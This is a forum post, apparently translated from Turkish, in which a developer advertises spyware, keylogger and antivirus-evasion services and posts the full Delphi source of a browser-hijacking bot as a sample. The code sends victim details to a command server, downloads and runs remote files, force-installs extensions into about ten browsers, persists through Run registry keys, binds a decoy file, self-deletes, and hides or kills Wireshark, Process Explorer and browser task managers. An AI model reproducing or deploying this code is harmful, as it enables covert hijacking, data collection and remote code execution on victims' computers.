I take on work through UzmanKirala.com.
- 16-10-2014, 14:42:34 This guy is very professional at his work; he has outdone himself, especially in Delphi and mobile applications.
- 16-10-2014, 16:16:57 He is a Delphi monster. You can have him write any application you can think of so that it runs stably.
- 16-10-2014, 16:22:51 Could you add me on Skype, my friend; musa_candir@hotmail.com
Quote from member tbtlb:
Hello friends,
I develop desktop and mobile applications in C/C++, Assembler and Delphi.
I do work involving fetching data from the internet, socket-based multithreaded client/server applications, json/xml/text data/video/image/audio processing, browser operations (home page changing programs, programs that install extensions), Undetecting, Spyware and KeyLogger.
I have references; you can request them via PM.
Those who want direct programming (C/C++/ASM/Delphi/VisualBasic/VBScript/PHP/ASP) training, those who are interested, those who want to ask questions and those who want to work with me can send a PM.
A sample code snippet that I wrote...
program Join; //{$DEFINE DEBUG_MODE_ON} // Hata Duzeltmeleri İcin; bu satiri kapatirsan siyah ekran gider. //{$DEFINE DEMO_VERSION} {$IFDEF DEBUG_MODE_ON} {$APPTYPE CONSOLE} // Siyah Ekran Gozukmesi Icin Gereklidir. {$ELSE} {$APPTYPE GUI} // Siyah Ekrani Gizlemek İcin; {$ENDIF} {$IFDEF DEBUG_MODE_ON} {$E .dll} {$ELSE} {$E .dll} {$ENDIF} {$WARNINGS OFF} {$HINTS OFF} {$R Generator.RES} { [+] Eklenen Ozellik [*] Duzeltilen Sorun [-] Cikarilan Ozellik [#] Gelistirilen Ozellik Guncelleme - 30.07.2014 + Dosya İle Birleştirme Özelliği Eklendi. + Registry Key ve Installation Name değiştirebilme Özelliği Eklendi. + Builder Özelliği Eklendi + Simge Değiştirebilme Özelliği Eklendi. + UPX ike Sıkıştırma Özelliği Eklendi. Guncelleme - 15.07.2014 + CloudFlare Destegi Eklendi. * CloudFlare gibi protected sunuculardan dosya cekim isleminde hata verip programin kirilmasina sebep olan problem duzeltildi. + User-Agent Eklendi + Redirection Eklendi + WireShark Anti Debugger Bypass Ozelligi Eklendi * Programin hata vermesine sebebiyet veren (SaveToFile) Free edilemeyen MemoryStream sorunu duzeltildi. * SaveToFile Fonksiyonu WinAPI kullanilarak improve edildi. + Demo Version Destegi Eklendi. Eklenenler - 01.07.2014 + Chrome görev yöneticisi ekranını otomatik kapatabilme özelliği eklendi. * Paneldeki Sorun Düzeltildi. * Programin komut almamasına sebep olan problem düzeltildi. * Uygulama installation dizini tekrar düzeltildi. # Bazı fonksiyonlar geliştirildi. Bilgisayar bilgisi alan fonksiyon düzenlendi. Guncelleme - 03.07.2014 * Process Sonlandirmadaki Yetkilendirme Problemi Duzeltildi. * Installation Islemi Threadindaki Olusan Hata Duzeltildi. - Taskkill /im /f process* fonksiyonu programdan cikarildi. 
} uses Windows, IdHTTP, Classes, IniFiles, shFolder, Math, ShellAPI, TlHelp32, ImageHlp, ShlObj, SysUtils, uRC4 in 'uRC4.pas', uPrefs in 'uPrefs.pas'; const CMD_CLOSESERVER = 1000; CMD_UNINSTALLFILE = 1001; CMD_UPDATESERVER = 1002; CMD_INSTALLEXTENSION = 1003; CMD_RESETBROWSERS = 1004; CMD_DOWNLOADANDEXECUTE = 1005; const NONE = $00; //Blank number INET_USERAGENT = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0'; INET_REDIRECT_MAX = 10; Type TCustomDownloadFile = record SavePath : string; end; TBotConfig = record Mutex : String; VictimName : string; VictimComputerName : string; VictimCountry : string; VictimLanguage : string; VictimOS : string; VictimVersion : string; SettingsFile : string; SettingsIniFile : TIniFile; ProductKey : string; CommandURL : string; InstallDirectory, InstallName, InstallDirectoryPath, RegistryName : string; End; TInfo = RECORD URL_ADDR : ARRAY [0..255] OF CHAR; BINDER : BOOL; FILE_NAME : ARRAY [0..255] OF CHAR; // BROWSER FIREFOX : BOOL; OPERA : BOOL; CHROME : BOOL; EXPLORER : BOOL; SAFARI : BOOL; PALEMON : BOOL; MAXTHON : BOOL; KMELEON : BOOL; DRAGON : BOOL; AVANT : BOOL; YANDEX : BOOL; TORCH : BOOL; IRON : BOOL; CHROMIUM : BOOL; SUPERBIRD : BOOL; CHROMECANARY : BOOL; //OTHER MELT : BOOL; PERSISTANCE : BOOL; ENCRYPT : BOOL; INSTALL : BOOL; //REGISTRY KEY : ARRAY [0..255] OF CHAR; PROGRAMNAME : ARRAY [0..255] OF CHAR; END; TBrowser = record // Tarayici Bilgileri; Firefox_Path, Firefox_Config, Firefox_Ext, Chrome_Path, Chrome_Config, Chrome_Ext, Yandex_Path, Yandex_Config, Yandex_Ext, ComodoDragon_Path, ComodoDragon_Config, ComodoDragon_Ext, Torch_Path, Torch_Config, Torch_Ext, Maxthon_Path, Maxthon_Config, Maxthon_Ext, Iron_Path, Iron_Config, Iron_Ext, Chromium_Path, Chromium_Config, Chromium_Ext, SuperBird_Path, SuperBird_Config, SuperBird_Ext, ChromeCanary_Path, ChromeCanary_Config, ChromeCanary_Ext, Opera_Path, Opera_Config, Opera_Ext : string; // Yuklenmis mi? 
Firefox_Installed, Chrome_Installed, Yandex_Installed, ComodoDragon_Installed, Torch_Installed, Maxthon_Installed, Iron_Installed, SuperBird_Installed, ChromeCanary_Installed, Chromium_Installed, Opera_Installed : Boolean; End; Const Parser : String = '~'; CurrentVersion : string = '0.9.9.2'; StartUpPath : string = 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run\'; var BotConfig : TBotConfig; INFO : TInfo; Procedure DemoVersion; begin {$IFDEF DEMO_VERSION} MessageBox(0,'DEVAM_ICIN_ILERI_BAS','DEMO_VERSION',MB_OK OR MB_ICONINFORMATION); {$ENDIF} end; Procedure DebugPrompt(pszData : string); begin //OutputDebugStringW(PWideChar(WideString(pszData))); //Writeln(pszData); //Writeln(pszData); {$IFDEF DEBUG_MODE_ON} Writeln(pszData) {$ENDIF} end; function KillTask(ExeFileName: string): Integer; const PROCESS_TERMINATE = $0001; var ContinueLoop: BOOL; FSnapshotHandle: THandle; FProcessEntry32: TProcessEntry32; begin Result := 0; FSnapshotHandle := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); FProcessEntry32.dwSize := SizeOf(FProcessEntry32); ContinueLoop := Process32First(FSnapshotHandle, FProcessEntry32); while Integer(ContinueLoop) <> 0 do begin if ((UpperCase(ExtractFileName(FProcessEntry32.szExeFile)) = UpperCase(ExeFileName)) or (UpperCase(FProcessEntry32.szExeFile) = UpperCase(ExeFileName))) then Result := Integer(TerminateProcess( OpenProcess(PROCESS_TERMINATE, BOOL(0), FProcessEntry32.th32ProcessID), 0)); ContinueLoop := Process32Next(FSnapshotHandle, FProcessEntry32); end; CloseHandle(FSnapshotHandle); end; procedure DetectChromeTaskManager; var guiInfo : TGUIThreadInfo; WindowName : string; arrWindow : array[0..255] of char; begin while True Do begin guiInfo.cbsize := sizeof(TGUIThreadInfo); GetGUIThreadInfo(0,guiInfo); ZeroMemory(@arrWindow,SizeOf(arrWindow)); GetWindowText(guiInfo.hwndActive,arrWindow,sizeof(arrWindow)); WindowName := trim(string(arrWindow)); if ( (WindowName = 'Görev Yöneticisi - Google Chrome') or (WindowName = 'Task Manager - Google 
Chrome') or (WindowName = 'Task Manager - Comodo Dragon') or (WindowName = 'Görev Yöneticisi - Comodo Dragon') or (WindowName = 'Yandex görev yöneticisi') or (WindowName = 'Task Manager Yandex') or (WindowName = 'Task Manager - Iron') or (WindowName = 'Görev Yöneticisi - Iron') or (WindowName = 'Task Manager - Superbird') or (WindowName = 'Görev Yöneticisi - Superbird') or (WindowName = 'Görev Yöneticisi - Torch') or (WindowName = 'Task Manager - Torch') ) then begin DebugPrompt(WindowName + ' Tespit Edildi ve KAPANDI'); CloseWindow(guiInfo.hwndActive); end else if (WindowName = 'Fiddler Web Debugger') or // Kill Debuggers; (Pos('rocess Explorer',WindowName)>0) or (Pos('rocess Hacker',WindowName)>0) then begin EnableWindow(guiInfo.hwndActive,false); ShowWindow(guiInfo.hwndActive,SW_HIDE); end else if (Pos('Wireshark',WindowName)>0) then begin KillTask('Wireshark.exe'); end; Sleep(1000); end; end; procedure Str2File(sData,sPath: string); var hFile: THandle; dWritten: DWORD; begin DebugPrompt('KAYIT YERI : ' + sPath); hFile := CreateFile(PChar(sPath), GENERIC_WRITE, FILE_SHARE_WRITE, nil, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0); if hFile <> 0 then begin SetFilePointer(hFile, 0, nil, FILE_BEGIN); WriteFile(hFile, sData[1], Length(sData), dWritten, nil); end; CloseHandle(hFile); DebugPrompt('KAYIT EDILDI!'); end; Function AddToRegistry(RegKey : HKey;dType : Cardinal;SubKey,SingleKey,Value : String) : Boolean; VAR Key : HKey; Begin Result := False; if RegOpenKeyEx(RegKey,PChar(SubKey), 0, KEY_WRITE, Key) = ERROR_SUCCESS then begin RegSetValueEx(Key, PAnsiChar(SingleKey), 0,dType, PChar(Value),Length(Value)); // The 1 is for the terminating 0 (PChar) RegCloseKey(Key); RegCloseKey(RegKey); end; End; function Url2File(data : string) : string; begin Result := StringReplace(data,'/','\',[rfReplaceAll]); end; function GetCustomPath(PathIndex : Integer) : string; var arrPath : array[0..255] of char; begin ZeroMemory(@arrPath,SizeOf(arrPath)); case PathIndex of 5 : begin 
GetTempPath(SizeOf(arrPath),@arrPath); end; // TEMP 6 : begin SHGetSpecialFolderPath(0,arrPath,CSIDL_APPDATA,false); end; // App DATA 7 : begin SHGetSpecialFolderPath(0,arrPath,CSIDL_LOCAL_APPDATA,false); end; // Local App DATA end; result := IncludeTrailingBackSlash(Trim(string(arrPath))); end; function GenerateRandomText(iLen : Integer): string; var i : Integer; begin Randomize; Result := ''; for i := 0 to iLen do begin Result := Result + Chr( RandomRange(65,90) ); end; end; function GetUserInfo(Index : Integer) : String; var arrData : array [0..255] of char; hSize : Cardinal; begin ZeroMemory(@arrData,SizeOf(arrData)); hSize := SizeOf(arrData); FillChar(arrData,SizeOf(arrData),#0); case Index of 0 : begin GetComputerName(arrData,hSize); end; // computername 1 : begin GetUserName(arrData,hSize); end; // username 2 : begin // country Info Windows.GetLocaleInfo(LOCALE_USER_DEFAULT,LOCALE_SISO3166CTRYNAME,arrData,SizeOf(arrData)) end; 3 : begin // language VerLanguageName(GetSystemDefaultLCID,arrData,SizeOf(arrData)); end; end; Result := string(Trim(string(arrData))); Result := StringReplace(Result,' ','_',[rfReplaceAll]); Result := StringReplace(Result,'.','_',[rfReplaceAll]); Result := StringReplace(Result,',','_',[rfReplaceAll]); Result := StringReplace(Result,'~','_',[rfReplaceAll]); Result := StringReplace(Result,'$','_',[rfReplaceAll]); Result := StringReplace(Result,'#','_',[rfReplaceAll]); Result := StringReplace(Result,'*','_',[rfReplaceAll]); Result := StringReplace(Result,'{','_',[rfReplaceAll]); Result := StringReplace(Result,'}','_',[rfReplaceAll]); Result := StringReplace(Result,'[','_',[rfReplaceAll]); Result := StringReplace(Result,']','_',[rfReplaceAll]); Result := StringReplace(Result,'(','_',[rfReplaceAll]); Result := StringReplace(Result,')','_',[rfReplaceAll]); Result := StringReplace(Result,'+','_',[rfReplaceAll]); Result := StringReplace(Result,'%','_',[rfReplaceAll]); Result := StringReplace(Result,'<','_',[rfReplaceAll]); Result := 
StringReplace(Result,'>','_',[rfReplaceAll]); Result := StringReplace(Result,'|','_',[rfReplaceAll]); Result := StringReplace(Result,'?','_',[rfReplaceAll]); Result := StringReplace(Result,'-','_',[rfReplaceAll]); if Length(Result) = 0 then Result := 'Unknown'; DebugPrompt('Info:'+IntToStr(Index)+ '---' +Result); end; function InternetDownloadFile(pszUrl : string;Execute: Boolean;HasParams : String):TCustomDownloadFile; var hDownloadSocket : TIdHTTP; stream : TMemoryStream; begin Result.SavePath := GetCustomPath(5) + ExtractFileName(Url2File(pszUrl)); If FileExists(Result.SavePath) then begin DeleteFileW(PWideChar(WideString(Result.SavePath))); end; DebugPrompt('URL ADRESİ : ' + pszUrl); stream := TMemoryStream.Create; hDownloadSocket := TIdHTTP.Create(nil); hDownloadSocket.request.userAgent := INET_USERAGENT; hDownloadSocket.redirectMaximum := INET_REDIRECT_MAX; hDownloadSocket.handleRedirects := INET_REDIRECT_MAX<>NONE; DebugPrompt('URL Adresi : ' + pszUrl); hDownloadSocket.Get(pszUrl,Stream); Stream.position := 0 ; If not FileExists(Result.SavePath) then begin Stream.SaveToFile(Result.SavePath); Stream.Free; end; if Execute = true then begin DebugPrompt(Result.SavePath); ShellExecuteA(0,'OPEN',PAnsiChar(Result.SavePath),PAnsiChar(HasParams),Nil,SW_SHOW); end; end; Procedure Melt(OldFile :String); var BatData : String; BatFile : String; Begin BatData :=':start'+#13#10+ 'ping -n 1 localhost'+#13#10+ 'del' + ' "' + OldFile + '"'+#13#10+ 'if exist' + ' "' + OldFile + '" ' + 'goto start'+ #13#10+ 'del %0'; BatFile:=IncludeTrailingBackSlash(GetCustomPath(5)) + 'Sil.bat'; Str2File(BatData,BatFile); ShellExecuteA(0, 'open', PAnsiChar(BatFile), nil, nil, SW_HIDE); End; procedure Uninstall; begin AddToRegistry(HKEY_CURRENT_USER,REG_SZ,StartUpPath,BotConfig.RegistryName,''); AddToRegistry(HKEY_LOCAL_MACHINE,REG_SZ,StartUpPath,BotConfig.RegistryName,''); Melt(ParamStr(0)); ExitProcess(0); end; function StringToUnicode(sString:String):String; var i:integer; begin Result := 
''; for i := 1 to Length(sString) do begin Result := Result + sString[i] + #0; end; end; procedure InstallFile; var pCurPath:Pointer; strPath : String; ServerMutex : THandle; begin AddToRegistry(HKEY_CURRENT_USER,REG_SZ,StartUpPath,BotConfig.RegistryName,BotConfig.InstallDirectoryPath); AddToRegistry(HKEY_LOCAL_MACHINE,REG_SZ,StartUpPath,BotConfig.RegistryName,BotConfig.InstallDirectoryPath); strPath := BotConfig.InstallDirectoryPath; strPath := StringToUnicode(strPath); if lstrlenW(@strPath[1]) <> 0 then begin GetMem(pCurPath,(MAX_PATH * 4)); if pCurPath <> nil then begin GetModuleFileNameW(0,pCurPath,(MAX_PATH * 4)); if lstrcmpiW(pCurPath,@strPath[1]) <> 0 then begin if CopyFileW(pCurPath,@strPath[1],False) then begin if ShellExecuteW(0,nil,@strPath[1],nil,nil,SW_SHOW) >= 32 then begin ExitProcess(0); end; end; end; FreeMem(pCurPath); end; end; ServerMutex := CreateMutex(nil,False,pchar(String(BotConfig.Mutex))); if GetLastError = ERROR_ALREADY_EXISTS then begin CloseHandle(ServerMutex); ExitProcess(0); end; end; procedure OpenBrowser; begin if ShellExecuteW(0,nil,'Chrome.exe',nil,nil,SW_SHOW) >= 32 then begin DebugPrompt('Chrome Calisti'); end else if ShellExecuteW(0,nil,'Firefox.exe',nil,nil,SW_SHOW) >= 32 then begin DebugPrompt('FireFox Calisti'); end else if ShellExecuteW(0,nil,'Browser.exe',nil,nil,SW_SHOW) >= 32 then begin DebugPrompt('Yandex Calisti'); end else if ShellExecuteW(0,nil,'Opera.exe',nil,nil,SW_SHOW) >= 32 then begin DebugPrompt('Opera Calisti'); end else if ShellExecuteW(0,nil,'Dragon.exe',nil,nil,SW_SHOW) >= 32 then begin DebugPrompt('Comodo Dragon Calisti'); end else if ShellExecuteW(0,nil,'iexplore.exe',nil,nil,SW_SHOW) >= 32 then begin DebugPrompt('Internet Explorer Calisti'); end else begin ShellExecuteA(0,'OPEN',PAnsiChar('http://facebook.com'),'',Nil,SW_SHOW); end; end; procedure ResetBrowsers; var strBrowserList : TStringList; i : Integer; begin strBrowserList := TStringList.Create; strBrowserList.Clear; // Tarayicilari Kapat with 
strBrowserList do begin Add('firefox.exe'); Add('chrome.exe'); Add('yandex.exe'); Add('iexplore.exe'); Add('browser.exe'); Add('dragon.exe'); Add('opera.exe'); Add('iron.exe'); Add('superbird.exe'); Add('torch.exe'); end; for i := 0 to strBrowserList.Count - 1 do begin DebugPrompt('Oldurulen Tarayici : ' + strBrowserList.Strings[i]); KillTask(strBrowserList.Strings[i]); end; end; function CheckExtensionIsInstalled(Url,Path : String) : Boolean; begin Result := False; if BotConfig.SettingsIniFile.ReadString('SETTINGS','LastExtension','')<>Url then begin BotConfig.SettingsIniFile.WriteString('SETTINGS','LastExtension',Url); Result := False; end else begin DebugPrompt('Bu Eklenti Zaten Yüklenmiştir...'); Result := True; end; end; procedure InstallExtension(pszData : string); var Key,Value,ExtensionURL : string; Browser : TBrowser; ExtName : string; begin // Eklenti Kur ExtensionURL := Copy(pszData,1,Pos(Parser,pszData)-1); Delete(pszData,1,Length(ExtensionURL)+1); Key := Copy(pszData,1,Pos(Parser,pszData)-1); Delete(pszData,1,Length(Key)+1); Value := Copy(pszData,1,Pos(Parser,pszData)-1); if CheckExtensionIsInstalled(ExtensionURL,Browser.Chrome_Ext + ExtName) = True then begin Exit; end; DebugPrompt('ExtensionURL:'+ExtensionURL); DebugPrompt('Key:'+Key); DebugPrompt('Value:'+Value); Browser.Chrome_Path := GetCustomPath(7) + 'Google\Chrome\User Data\Default\Extensions\'; Browser.Chrome_Config := GetCustomPath(7) + 'Google\Chrome\User Data\Default\Preferences'; MakeSureDirectoryPathExists(PAnsiChar(AnsiString(Browser.Chrome_Path))); Browser.Chrome_Installed := FileExists(Browser.Chrome_Config); Browser.Chrome_Ext := IncludeTrailingBackSlash(Browser.Chrome_Path + Key); MakeSureDirectoryPathExists(PAnsiChar(Browser.Chrome_Ext)); DebugPrompt(Browser.Chrome_Ext); Browser.Yandex_Path := GetCustomPath(7) + 'Yandex\YandexBrowser\User Data\Default\Extensions\'; Browser.Yandex_Config := GetCustomPath(7) + 'Yandex\YandexBrowser\User Data\Default\Preferences'; 
MakeSureDirectoryPathExists(PAnsiChar(AnsiString(Browser.Yandex_Path))); Browser.Yandex_Installed := FileExists(Browser.Yandex_Config); Browser.Yandex_Ext := IncludeTrailingBackSlash(Browser.Yandex_Path + Key); MakeSureDirectoryPathExists(PAnsiChar(Browser.Yandex_Ext)); DebugPrompt(Browser.Yandex_Ext); Browser.ComodoDragon_Path := GetCustomPath(7) + 'COMODO\Dragon\User Data\Default\Extensions\'; Browser.ComodoDragon_Config := GetCustomPath(7) + 'COMODO\Dragon\User Data\Default\Preferences'; MakeSureDirectoryPathExists(PAnsiChar(AnsiString(Browser.ComodoDragon_Path))); Browser.ComodoDragon_Installed := FileExists(Browser.ComodoDragon_Config); Browser.ComodoDragon_Ext := IncludeTrailingBackSlash(Browser.ComodoDragon_Path + Key); MakeSureDirectoryPathExists(PAnsiChar(Browser.ComodoDragon_Ext)); DebugPrompt(Browser.ComodoDragon_Ext); Browser.ChromeCanary_Path := GetCustomPath(7) + 'Google\Chrome SxS\User Data\Default\Extensions\'; Browser.ChromeCanary_Config := GetCustomPath(7) + 'Google\Chrome SxS\User Data\Default\Preferences'; MakeSureDirectoryPathExists(PAnsiChar(AnsiString(Browser.ChromeCanary_Path))); Browser.ChromeCanary_Installed := FileExists(Browser.ChromeCanary_Config); Browser.ChromeCanary_Ext := IncludeTrailingBackSlash(Browser.ChromeCanary_Path + Key); MakeSureDirectoryPathExists(PAnsiChar(Browser.ChromeCanary_Ext)); DebugPrompt(Browser.ChromeCanary_Ext); Browser.Chromium_Path := GetCustomPath(7) + 'Chromium\User Data\Default\Extensions\'; Browser.Chromium_Config := GetCustomPath(7) + 'Chromium\User Data\Default\Preferences'; MakeSureDirectoryPathExists(PAnsiChar(AnsiString(Browser.Chromium_Path))); Browser.Chromium_Installed := FileExists(Browser.Chromium_Config); Browser.Chromium_Ext := IncludeTrailingBackSlash(Browser.Chromium_Path + Key); MakeSureDirectoryPathExists(PAnsiChar(Browser.Chromium_Ext)); DebugPrompt(Browser.Chromium_Ext); Browser.Torch_Path := GetCustomPath(7) + 'Torch\User Data\Default\Extensions\'; Browser.Torch_Config := 
GetCustomPath(7) + 'Torch\User Data\Default\Preferences'; MakeSureDirectoryPathExists(PAnsiChar(AnsiString(Browser.Torch_Path))); Browser.Torch_Installed := FileExists(Browser.Torch_Config); Browser.Torch_Ext := IncludeTrailingBackSlash(Browser.Torch_Path + Key); MakeSureDirectoryPathExists(PAnsiChar(Browser.Torch_Ext)); DebugPrompt(Browser.Torch_Ext); Browser.SuperBird_Path := GetCustomPath(7) + 'SuperBird\User Data\Default\Extensions\'; Browser.SuperBird_Config := GetCustomPath(7) + 'SuperBird\User Data\Default\Preferences'; MakeSureDirectoryPathExists(PAnsiChar(AnsiString(Browser.SuperBird_Path))); Browser.SuperBird_Installed := FileExists(Browser.SuperBird_Config); Browser.SuperBird_Ext := IncludeTrailingBackSlash(Browser.SuperBird_Path + Key); MakeSureDirectoryPathExists(PAnsiChar(Browser.SuperBird_Ext)); DebugPrompt(Browser.SuperBird_Ext); Browser.Opera_Path := GetCustomPath(6) + 'Opera Software\Opera Stable\Extensions\'; Browser.Opera_Config := GetCustomPath(6) + 'Opera Software\Opera Stable\Preferences'; MakeSureDirectoryPathExists(PAnsiChar(AnsiString(Browser.Opera_Path))); Browser.Opera_Installed := FileExists(Browser.Opera_Config); Browser.Opera_Ext := IncludeTrailingBackSlash(Browser.Opera_Path + Key); MakeSureDirectoryPathExists(PAnsiChar(Browser.Opera_Ext)); DebugPrompt(Browser.Opera_Ext); with InternetDownloadFile(ExtensionURL,false,'') do begin ExtName := ExtractFileName(SavePath); DebugPrompt(#13#10#13#10); DebugPrompt('YAZILACAK YER : ' + Browser.Chrome_Ext + ExtName); DebugPrompt('NEREDEN : ' + SavePath); DebugPrompt('Browserlar Resetleniyor..'); ResetBrowsers; DebugPrompt('Browserlar Resetlendi.'); Sleep(5000); DebugPrompt('Chrome_Ext : ' + Browser.Chrome_Ext + ExtName); CopyFile(PansiChar(SavePath),PAnsiChar(Browser.Chrome_Ext + ExtName),False); Str2File(GenerateChromePreferences(Value,Key,Browser.Chrome_Ext + ExtName), Browser.Chrome_Config); DebugPrompt('Yandex_Ext : ' + Browser.Yandex_Ext + ExtName); 
CopyFile(PansiChar(SavePath),PAnsiChar(Browser.Yandex_Ext + ExtName),False); Str2File(GenerateChromePreferences(Value,Key,Browser.Yandex_Ext + ExtName), Browser.Yandex_Config); DebugPrompt('ComodoDragon_Ext : ' + Browser.ComodoDragon_Ext + ExtName); CopyFile(PansiChar(SavePath),PAnsiChar(Browser.ComodoDragon_Ext + ExtName),False); Str2File(GenerateChromePreferences(Value,Key,Browser.ComodoDragon_Ext + ExtName), Browser.ComodoDragon_Config); DebugPrompt('Torch_Ext : ' + Browser.Torch_Ext + ExtName); CopyFile(PansiChar(SavePath),PAnsiChar(Browser.Torch_Ext + ExtName),False); Str2File(GenerateChromePreferences(Value,Key,Browser.Torch_Ext + ExtName), Browser.Torch_Config); DebugPrompt('Opera_Ext : ' + Browser.Opera_Ext + ExtName); CopyFile(PansiChar(SavePath),PAnsiChar(Browser.Opera_Ext + ExtName),False); Str2File(GenerateChromePreferences(Value,Key,Browser.Opera_Ext + ExtName), Browser.Opera_Config); DebugPrompt('ChromeCanary_Ext : ' + Browser.ChromeCanary_Ext + ExtName); CopyFile(PansiChar(SavePath),PAnsiChar(Browser.ChromeCanary_Ext + ExtName),False); Str2File(GenerateChromePreferences(Value,Key,Browser.ChromeCanary_Ext + ExtName), Browser.ChromeCanary_Config); DebugPrompt('Chromium_Ext : ' + Browser.Chromium_Ext + ExtName); CopyFile(PansiChar(SavePath),PAnsiChar(Browser.Chromium_Ext + ExtName),False); Str2File(GenerateChromePreferences(Value,Key,Browser.Chromium_Ext + ExtName), Browser.Chromium_Config); DebugPrompt('SuperBird_Ext : ' + Browser.SuperBird_Ext + ExtName); CopyFile(PansiChar(SavePath),PAnsiChar(Browser.SuperBird_Ext + ExtName),False); Str2File(GenerateChromePreferences(Value,Key,Browser.SuperBird_Ext + ExtName), Browser.SuperBird_Config); DebugPrompt('Tarayici Calistiriliyor..'); OpenBrowser; DebugPrompt('Tarayici Calistirildi.'); Exit; end; end; procedure UpdateServer(pszNewFile : string); begin // Server Guncelle with InternetDownloadFile(pszNewFile,True,'') do begin ExitProcess(0); end; end; procedure CheckCommands(Data : string); var CommandID : 
Integer; Params : String; IsCommandApplied : Boolean; begin Data := Trim(Data); Delete(Data,1,Pos(':',Data)); IsCommandApplied := False; if BotConfig.SettingsIniFile.ReadString('SETTINGS','LastCommandHash','')<>Data then begin BotConfig.SettingsIniFile.WriteString('SETTINGS','LastCommandHash',Data); IsCommandApplied := True; end; if IsCommandApplied = false then begin DebugPrompt('Bu Komut Daha Önceden Zaten Uygulanmış'); Exit; end; Data := HexToStr(Trim(Data)); CommandID := StrToIntDef(Copy(Data,1,Pos(Parser,Data)-1),0); Delete(Data,1,Length(IntToStr(CommandID))+1); case CommandID of CMD_CLOSESERVER : begin ExitProcess(0); end; CMD_UNINSTALLFILE : begin Uninstall; end; CMD_UPDATESERVER : begin DebugPrompt(Data); UpdateServer(Data); end; CMD_RESETBROWSERS : begin ResetBrowsers; OpenBrowser; end; CMD_INSTALLEXTENSION : begin InstallExtension(Data); end; CMD_DOWNLOADANDEXECUTE : begin InternetDownloadFile(Data,True,''); end; end; end; function Decrypt(St: string): string; var i: integer; a: byte; begin Result := ''; for i := length(St) downto 1 do begin A := ord(St[i]); result := result + char(a+1); end; end; procedure ReadCommands; var Socket: TIdHTTP; lstParams : TStringList; strResponse : string; begin lstParams := TStringList.Create; lstParams.Clear; lstParams.add('vKey='+BotConfig.ProductKey); lstParams.add('uID='+BotConfig.VictimName); lstParams.add('cID='+BotConfig.VictimComputerName); lstParams.add('vCountry='+BotConfig.VictimCountry); lstParams.add('vLang='+BotConfig.VictimLanguage); lstParams.add('vVer='+BotConfig.VictimVersion); lstParams.add('vOS='+BotConfig.VictimOS); while True do begin try Socket:= TIdHTTP.Create(nil); Socket.request.userAgent:= INET_USERAGENT; Socket.redirectMaximum := INET_REDIRECT_MAX; Socket.handleRedirects := INET_REDIRECT_MAX<>NONE; Socket.Port := 80; strResponse := Socket.Post(BotConfig.CommandURL,lstParams); except on e : Exception do begin DebugPrompt(E.Message); end; end; DebugPrompt('KOMUT OKUNDU:'+strResponse); 
CheckCommands(strResponse); strResponse:=''; Sleep(10000); end; end; var Msg : TMSG; ServerMutex, threadTaskManager, threadChromeTaskManagerControl, threadReadCommands, threadInstallServer : THandle; ResData : String; ResourceStream : TResourceStream; Stream : TMemoryStream; FileData : String; BindFilePath : String; threadTaskManagerId, threadInstallServerId, lpReadCommandThreadId : cardinal; begin DemoVersion; SetErrorMode(SEM_FAILCRITICALERRORS + SEM_NOALIGNMENTFAULTEXCEPT + SEM_NOGPFAULTERRORBOX + SEM_NOOPENFILEERRORBOX); DemoVersion; ResData:=''; ResourceStream:=TResourceStream.Create(0,'TKEY',RT_RCDATA); ResourceStream.Position:=0; SetString(ResData,pansichar(ResourceStream.Memory),ResourceStream.Size); ResData := Decrypt(ResData); DebugPrompt('DECRYPTED RES DATA : ' + ResData); Stream := TMemoryStream.Create; Stream.Write(pointer(ResData)^,Length(ResData)); Stream.Position := 0; Stream.Read(Info,SizeOf(TInfo)); FileData:=''; try ResourceStream:=TResourceStream.Create(0,'TFILE',RT_RCDATA); SetString(FileData,pansichar(ResourceStream.Memory),ResourceStream.Size); except on e : Exception do begin OutputDebugStringA(PAnsiChar(e.Message)); end; end; FileData := Decrypt(FileData); BotConfig.ProductKey := 'DENEMETEST'; BotConfig.Mutex := 'DENEMETESTv10'; BotConfig.VictimName := GetUserInfo(1); BotConfig.VictimComputerName := GetUserInfo(0); BotConfig.VictimCountry := GetUserInfo(2); BotConfig.VictimLanguage := GetUserInfo(3); BotConfig.InstallName := String(INFO.PROGRAMNAME); BotConfig.RegistryName := String(INFO.KEY); BotConfig.CommandURL := String(INFO.URL_ADDR); DemoVersion; BotConfig.SettingsFile := GetCustomPath(7) + BotConfig.VictimCountry + '_' + BotConfig.VictimName + '\' + BotConfig.VictimComputerName + '\' + BotConfig.VictimCountry + '\DENEMETEST.ini' ; MakeSureDirectoryPathExists(PAnsiChar(IncludeTrailingBackSlash(ExtractFilePath(BotConfig.SettingsFile)))); DebugPrompt(BotConfig.SettingsFile); DemoVersion; {$IFDEF DEBUG_MODE_ON} 
DeleteFileA(PAnsiChar(BotConfig.SettingsFile)); {$ENDIF} DemoVersion; BotConfig.SettingsIniFile := TIniFile.Create(BotConfig.SettingsFile); BotConfig.InstallDirectory := IncludeTrailingBackSlash(ExtractFilePath(BotConfig.SettingsFile)); BotConfig.InstallDirectoryPath := BotConfig.InstallDirectory + BotConfig.InstallName; DemoVersion; DemoVersion; {$IFNDEF DEBUG_MODE_ON} if INFO.INSTALL=True then begin InstallFile; end; {$ENDIF} DemoVersion; threadReadCommands := CreateThread(Nil,0,@ReadCommands,nil,0,lpReadCommandThreadId); threadTaskManager := CreateThread(nil,0,@DetectChromeTaskManager,nil,0,threadChromeTaskManagerControl); BindFilePath := BotConfig.InstallDirectory + INFO.FILE_NAME; DebugPrompt('Bindirilen Dosya : ' + BindFilePath); if Info.BINDER=TRUE then begin if not FileExists(BindFilePath) then begin DebugPrompt('Bindirilen Dosya Calıştırılıyor...'); Str2File(FileData,BindFilePath); ShellExecuteA(0,'OPEN',PAnsiChar(BindFilePath),'',NIL,SW_SHOW); DebugPrompt('Bindirilen Dosya Calistirildi'); end; end; While GetMessage(Msg,0,0,0) Do begin TranslateMessage(Msg); DispatchMessage(Msg); end; end.
Written from my iPhone 5 using Tapatalk.